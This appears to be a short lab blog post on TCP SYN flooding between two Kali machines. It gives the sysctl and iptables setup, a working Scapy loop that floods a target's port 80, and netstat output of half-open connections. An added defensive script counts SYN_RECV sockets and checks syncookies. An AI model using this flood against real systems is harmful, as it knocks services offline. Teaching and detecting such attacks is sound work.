
TCP SYN Flooding

by ^..^v 2019. 6. 7.

TCP SYN Flooding

SYN packets are sent to the target continuously.

 

Disable syncookies on Kali#1

root@kali:~# sysctl -a | grep syncookies
net.ipv4.tcp_syncookies = 1 ⇐ syncookies enabled = SYN cookies are used when the SYN backlog queue is full
sysctl: reading key "net.ipv6.conf.all.stable_secret"
sysctl: reading key "net.ipv6.conf.default.stable_secret"
sysctl: reading key "net.ipv6.conf.eth0.stable_secret"
sysctl: reading key "net.ipv6.conf.lo.stable_secret"

root@kali:~# sysctl -w net.ipv4.tcp_syncookies=0 ⇐ disable syncookies so the lab runs smoothly
net.ipv4.tcp_syncookies = 0

root@kali:~# sysctl -a | grep syncookies
net.ipv4.tcp_syncookies = 0
sysctl: reading key "net.ipv6.conf.all.stable_secret"
sysctl: reading key "net.ipv6.conf.default.stable_secret"
sysctl: reading key "net.ipv6.conf.eth0.stable_secret"
sysctl: reading key "net.ipv6.conf.lo.stable_secret"

 

On Kali#2, add a firewall rule so that RST packets cannot leave the host

root@kali:~# iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

 

Check the firewall policy on Kali#2

root@kali:~# iptables -L -n 
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp flags:0x04/0x04

 

SYN flooding attack from Kali#2

>>> ip = IP()
>>> ip.dst= "192.168.111.130"
>>> tcp = TCP()
>>> tcp.dport = 80
>>> tcp.sport = RandNum(1024,65535)
>>> tcp.flags = "S"
>>> syn = ip/tcp
>>> send(syn, loop=True)

 

Confirm the attack on Kali#1

root@kali:~# netstat -an | grep -i syn_recv
tcp6       0      0 192.168.111.130:80      192.168.111.131:31498   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:13962   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:58815   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:62506   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:60498   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:57556   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:19512   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:38476   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:50493   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:20851   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:20618   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:59819   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:58459   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:36364   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:15042   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:49831   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:18564   SYN_RECV   
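
Added example, not part of the original post: a defender-side check that turns the netstat step above into a per-listener count of SYN_RECV sockets and reports the tcp_syncookies setting that the lab turned off. The function names, the alert limits and the sample lines are constructed for illustration.

```shell
# Constructed sample in the column layout of the netstat output above.
sample_netstat() {
cat <<'EOF'
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp6       0      0 192.168.111.130:80      192.168.111.131:31498   SYN_RECV
tcp6       0      0 192.168.111.130:80      192.168.111.131:13962   SYN_RECV
tcp6       0      0 192.168.111.130:80      192.168.111.131:58815   SYN_RECV
tcp6       0      0 192.168.111.130:80      192.168.111.131:62506   SYN_RECV
tcp        0      0 192.168.111.130:22      192.168.111.1:50522     ESTABLISHED
tcp        0      0 192.168.111.130:22      192.168.111.1:50523     SYN_RECV
EOF
}

# synrecv_report LIMIT: reads `netstat -an` output on stdin and prints, per
# local endpoint, "<local> <half_open> <distinct_source_ips> <OK|ALERT>".
synrecv_report() {
  awk -v limit="$1" '
    $1 ~ /^tcp/ && $6 == "SYN_RECV" {
      lep = $4
      src = $5; sub(/:[0-9]+$/, "", src)      # drop the source port, keep the IP
      count[lep]++
      if (!((lep, src) in seen)) { seen[lep, src] = 1; srcs[lep]++ }
    }
    END {
      for (l in count)
        printf "%s %d %d %s\n", l, count[l], srcs[l],
               (count[l] >= limit ? "ALERT" : "OK")
    }' | sort
}

# syncookies_status [FILE]: interpret net.ipv4.tcp_syncookies (0, 1 or 2).
syncookies_status() {
  f="${1:-/proc/sys/net/ipv4/tcp_syncookies}"
  v="$(cat "$f" 2>/dev/null)" || v=""
  case "$v" in
    0) echo "disabled" ;;
    1) echo "on-backlog-overflow" ;;
    2) echo "always" ;;
    *) echo "unknown" ;;
  esac
}

# On a live host: netstat -an | synrecv_report 100   (100 is an assumed limit)
sample_netstat | synrecv_report 3
echo "tcp_syncookies: $(syncookies_status)"
```

A high half-open count coming from a single source IP, as in the lab output above, combined with a "disabled" syncookies status means the listener's SYN backlog is unprotected; re-enable it with sysctl -w net.ipv4.tcp_syncookies=1 after the exercise.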